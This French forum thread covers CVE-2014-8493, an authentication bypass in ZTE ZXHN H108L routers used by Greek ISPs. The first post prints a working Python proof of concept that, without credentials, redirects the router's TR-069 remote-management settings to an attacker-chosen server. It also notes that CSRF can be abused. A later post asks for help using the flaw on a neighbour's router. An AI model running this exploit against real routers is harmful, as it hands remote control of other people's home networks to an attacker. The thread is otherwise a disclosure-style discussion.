Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-11-2014 16:54:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

ZTE ZXHN H108L: la box grecque en danger

1416318652.png


  Avant toute chose : Nous tenons à chaleureusement remercier ZTE pour égayer si régulièrement nos colonnes.
Et pour permettre à tant de jeunes de se révéler sur la scène du hack.

Après un petit détour par l'Espagne ( cf ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor ); je vous convie à suivre les trépidantes aventures du grand industriel de l'empire du milieu au pays de Socrate, Pythagore et des giros-frite à moins de 2€; le berceau de la démocratie et de la civilisation européenne où le temps semble suspendre son envol pour contempler le mont olympe :  la Grèce.
  C'est beau la Grèce... je vous conseille d'y aller. Certains pourrait me traiter de barge mais j'aime bien lorsque je voyage dans un pays regarder un peu quels ISP se disputent le marché, quel matos ils utilisent etc... entre une visite au Parthénon et un pause café-baklava c'est le pied!
   
  Donc j'ai pu observer en me baladant et en faisant un peu de "wardriving" ( mais à pattes)  l'omniprésence à Athènes et Thessalonique  des deux ISP ; Wind et Forthnet.
 
  Et je me suis connecté plusieurs fois chez mes hôtes sur des réseaux forthnet
  Les performances sont  moyennes, 10-12 Mbps de bande passante descendante et 1 Mbps de bande passante montante; mais les deux opérateurs ont un grand succès car ils pratiquent des prix très compétitifs avec des offres bien ciblées ( ex: pour 20€ internet + abonnement téléphone avec 2-3 numéros (famille.conjoint..) gratuit en permanence )   

  Revers de la médaille, le matos utilisé pour déployer les réseaux domestiques est vraiment "entrée de gamme".
  Et dans ce cas c'est malheureusement de l'entrée de gamme et du estampillé ZTE. big_smile


  Je vous laisse admirer le design, sûrement inspiré par fisher price, de la box en vogue chez les hellènes

1416322429.png


  Le coût de fabrication et de vente doit être minime car c'est vraiment du minimalisme pur.
  Quand à la portée wireless elle bénéfice d'un incomparable système d'antennes internes comme seul ZTE  sait le faire, garantissant une atténuation optimale du signal et ce des les premiers mètres!
  Attention au coup de vents : votre box forthnet ou wind (elle porte bien son nom du coup ) est tellement légère qu'elle pourrait s'envoler.

  Quant au niveau de sécurité de ce petit bijou je vous laisse juger par vous mêmes....

CVE-2014-8493 – ZTE ZXHN H108L Authentication Bypass

  L'opérateur utilise le CWMP pour configurer à distance les points d'accès. Côté routeur les paramètres de cette fonction se trouvent généralement dans la rubrique "TR-069" des interfaces de configuration. Il s'agit d'un protocle bidirectionel  SOAP/HTTP qui permet a des serveurs dédiés à la configuration automatisée ( A.C.S - Auto Configuration Servers ) de gérer les actualisations des point d’accès domestiques ( CPE  customer-premises equipment )
 

ComunicacionTR69_3.PNG


Pour plus de détails vous pouvez lire l'article de la wiki, mais en anglais, celui en français est presque inexistant :
TR-069


Le  ZTE ZXHN H108L avec le firmware ZXHN H108LV4.0.0d_ZRQ_GR4 laisse reconfigurer le TR-069 sans avoir les droits d'administrateurs par une simple requête http POST.( contenant des données à enregistrer-exécuter)

  De plus, l'absence de  protection CSRF peut permettre l'utilisation de codes java malicieux en utilisant une page web faite maison.


Voici un script en python pour illustrer cette étude

#!/usr/bin/python

import requests

acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"

# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.

conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"

#Periodic inform parameters
active = 1
interval = 2000

payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }

r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)

Notons au passage que les IT de "Projectzero", à l'origine de cette découverte,  ont communiqué leur découverte à ZTE
Qui a bien évidement botté en touche pour les renvoyer vers leurs ISPs.
Qui n'ont pas répondu.
Donc, très logiquement,  full disclosure, ne serait-ce que pour apprendre les bonnes manières. cool


lien vers la web des auteurs : Project zero

On se revoit pour le prochain full disclosure ZTE wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-11-2014 17:01:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : ZTE ZXHN H108L: la box grecque en danger

De plus en plus noobs ceux-la décidément.

Hors Ligne

#3 18-11-2014 17:09:31

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : ZTE ZXHN H108L: la box grecque en danger

La liste s'allonge comme un jour sans fin...
Nous saurons dans le futur, avec les nouveaux modèles et les nouveaux firmware, si chez ZTE le secteur sécurité est dirigé par Bozo le clown ou pas.
Parce que vu  la dernière fournée, le doute est permis big_smile

Hors Ligne

#4 18-11-2014 19:45:46

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : ZTE ZXHN H108L: la box grecque en danger

kcdtv a écrit :

Nous saurons dans le futur, avec les nouveaux modèles et les nouveaux firmware, si chez ZTE le secteur sécurité est dirigé par Bozo le clown ou pas.

Tu viens encore de te faire des amis là, pas sur qu'ils t'invitent en chine ceux là par contre lol

Regarde, ils te font coucou depuis le ZTE R&D building:

640px-Ztetower.JPG

big_smile

Hors Ligne

#5 18-04-2015 22:06:54

Desuu
N00b
Inscription : 18-04-2015
Messages : 1

Re : ZTE ZXHN H108L: la box grecque en danger

Bonsoir,

Récemment, un voisin a acquis un routeur ZTE ZXHN H108L. Le problème c'est qu'il est possible de créer un deuxième réseau avec ce routeur qui est par défaut ouvert. Utile si on veut donner un accès rapidement a des invités, mais bon voila que ça fait plus que 3 mois qu'ils l'ont oublier. Normalement, ça ne me concerne pas, mais je viens de découvrir grâce a un coup d'airodump que mes enfants se connecte dessous depuis longtemps alors qu'ils sont privé d'internet durant la semaine. J'ai essayer d’accéder a l'interface du routeur mais les identifiants par défaut ne sont pas admin/admin alors en recherchant j'ai découvert cette faille qui permet d’accéder a l'interface. J'aimerai savoir s'il vous plait si c'est possible de m'aider
ZXHN

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
3 6654 18-10-2014 00:10:57 par M1ck3y
Danger sur la santé ? par shady45
4 2329 04-12-2011 23:35:17 par antares145
7 1142 22-12-2010 22:02:11 par Veidam
6 1962 04-11-2010 20:06:42 par Dack
Danger clé usb par goliate
0 835 09-09-2010 13:58:32 par goliate

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]